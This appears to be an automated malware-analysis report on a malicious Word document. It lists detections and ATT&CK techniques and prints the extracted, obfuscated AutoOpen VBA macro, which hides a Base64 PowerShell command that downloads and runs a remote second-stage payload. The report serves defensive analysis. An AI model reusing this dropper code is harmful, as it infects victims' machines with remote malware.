MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1105 Ingress Tool Transfer
The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro utilizes a Shell() call to execute a command, likely to download and run a second-stage payload. The ClamAV detection name 'Doc.Dropper.Agent-6467498-0' further supports its dropper functionality.
Heuristics 7
-
ClamAV: Doc.Dropper.Agent-6467498-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6467498-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5828 bytes |
SHA-256: 1e5c4c1d5fdda89be2faa10795a99c941edabe2aeb386746ff232e2be2e88555 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "bet"
Sub AutoOpen()
Dim HM_SI As String
EQ_QH = Array("i", "l", "c", "h", "e", "u", "d", "p", "a", "y", " ", "w", "s", "-", "r", "t", "n", "o", "x", "b")
Dim EK_PI As String
EK_PI = "ZgB1AG4AYwB0AGkAbwBuACAAY"
HM_SI = HM_SI + EQ_QH(7)
HM_SI = HM_SI + EQ_QH(17)
Dim FS_KI As String
FS_KI = "QAoACQAeAApAHsAcgBlAHQAdQByAG4AIABbAFMAeQBzAHQ"
HM_SI = HM_SI + EQ_QH(11)
HM_SI = HM_SI + EQ_QH(4)
Dim BS_KB As String
BS_KB = "AZQBtAC4AVABlAH"
HM_SI = HM_SI + EQ_QH(14)
HM_SI = HM_SI + EQ_QH(12)
Dim DT_NC As String
DT_NC = "gAdAAuAEUAbgBjAG8AZAB"
HM_SI = HM_SI + EQ_QH(3)
HM_SI = HM_SI + EQ_QH(4)
Dim IS_PJ As String
IS_PJ = "pAG4AZw"
BL_QE = BL_QE & EK_PI & FS_KI & BS_KB & DT_NC & IS_PJ
HM_SI = HM_SI + EQ_QH(1)
HM_SI = HM_SI + EQ_QH(1)
Dim JP_LH As String
JP_LH = "BdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIA"
HM_SI = HM_SI + EQ_QH(10)
HM_SI = HM_SI + EQ_QH(13)
Dim BS_RH As String
BS_RH = "aQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdA"
HM_SI = HM_SI + EQ_QH(11)
HM_SI = HM_SI + EQ_QH(0)
Dim DP_TJ As String
DP_TJ = "BdADoAOgBGAHI"
HM_SI = HM_SI + EQ_QH(16)
HM_SI = HM_SI + EQ_QH(6)
Dim JT_SH As String
JT_SH = "AbwBtAEIAYQBzAGUANgA0AFMAdAByA"
HM_SI = HM_SI + EQ_QH(17)
HM_SI = HM_SI + EQ_QH(11)
Dim IN_TA As String
IN_TA = "GkAbgBnACgAJAB4ACkAKQB9ADsAaQBlAHgAIAAkAC"
BL_QE = BL_QE & JP_LH & BS_RH & DP_TJ & JT_SH & IN_TA
HM_SI = HM_SI + EQ_QH(12)
HM_SI = HM_SI + EQ_QH(15)
Dim BT_NC As String
BT_NC = "gAYQAgACQAKAAkACgAJAAoAGkAbgB2AG8AawBlAC0AdwBl"
HM_SI = HM_SI + EQ_QH(9)
HM_SI = HM_SI + EQ_QH(1)
Dim IQ_KC As String
IQ_KC = "AGIAcgBlAHEAdQBlAHMAdAAgACcAaAB0AHQAcA"
HM_SI = HM_SI + EQ_QH(4)
HM_SI = HM_SI + EQ_QH(10)
Dim HN_RB As String
HN_RB = "BzADoALwAvAHUAcwBwAHIAZAA1ADEANQAwAGMAZQBuAHQAcgB"
HM_SI = HM_SI + EQ_QH(3)
HM_SI = HM_SI + EQ_QH(0)
Dim BQ_NE As String
BQ_NE = "hAGwALgB0AGEAYgBsAGUALgBjAG8AcgBlAC4AdwBpAG"
HM_SI = HM_SI + EQ_QH(6)
HM_SI = HM_SI + EQ_QH(6)
Dim JK_KG As String
JK_KG = "4AZABvAHcAcwAuAG4AZQB0AC8AdwBhAHIAZQBoA"
BL_QE = BL_QE & BT_NC & IQ_KC & HN_RB & BQ_NE & JK_KG
HM_SI = HM_SI + EQ_QH(4)
HM_SI = HM_SI + EQ_QH(16)
Dim DT_KI As String
DT_KI = "G8AdQBzAGUAPwAkAGYAaQBsAHQAZQByAD0AU"
HM_SI = HM_SI + EQ_QH(10)
HM_SI = HM_SI + EQ_QH(13)
Dim JT_OH As String
JT_OH = "ABhAHIAdABpAHQAaQBvAG4ASwB"
HM_SI = HM_SI + EQ_QH(4)
HM_SI = HM_SI + EQ_QH(18)
Dim GO_QD As String
GO_QD = "lAHkAJQAyADAAZQBxACUAMgAwACUAMgA3AHMAdABhAG"
HM_SI = HM_SI + EQ_QH(4)
HM_SI = HM_SI + EQ_QH(2)
Dim CQ_LA As String
CQ_LA = "cAZQAlADIANwAmACQAUwBlAG"
HM_SI = HM_SI + EQ_QH(5)
HM_SI = HM_SI + EQ_QH(15)
Dim CL_OB As String
CL_OB = "wAZQBjAHQAPQB"
BL_QE = BL_QE & DT_KI & JT_OH & GO_QD & CQ_LA & CL_OB
HM_SI = HM_SI + EQ_QH(0)
HM_SI = HM_SI + EQ_QH(17)
Dim BN_OB As String
BN_OB = "kAGEAdABhACYAcwB2AD0AMgAwADEANwAt"
HM_SI = HM_SI + EQ_QH(16)
HM_SI = HM_SI + EQ_QH(7)
Dim BQ_NJ As String
BQ_NJ = "ADAANAAtADEANwAmAHMAcwA9AGIAZgBx"
HM_SI = HM_SI + EQ_QH(17)
HM_SI = HM_SI + EQ_QH(1)
Dim BO_OJ As String
BO_OJ = "AHQAJgBzAHIAdAA9AH"
HM_SI = HM_SI + EQ_QH(0)
HM_SI = HM_SI + EQ_QH(2)
Dim BM_TC As String
BM_TC = "MAYwBvACYAcwBwAD0AcgB3AGQAbABhAG"
HM_SI = HM_SI + EQ_QH(9)
HM_SI = HM_SI + EQ_QH(10)
Dim GL_PD As String
GL_PD = "MAdQBwACYAcwBlAD0AMgAwADEANwAtADEA"
BL_QE = BL_QE & BN_OB & BQ_NJ & BO_OJ & BM_TC & GL_PD
HM_SI = HM_SI + EQ_QH(19)
HM_SI = HM_SI
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.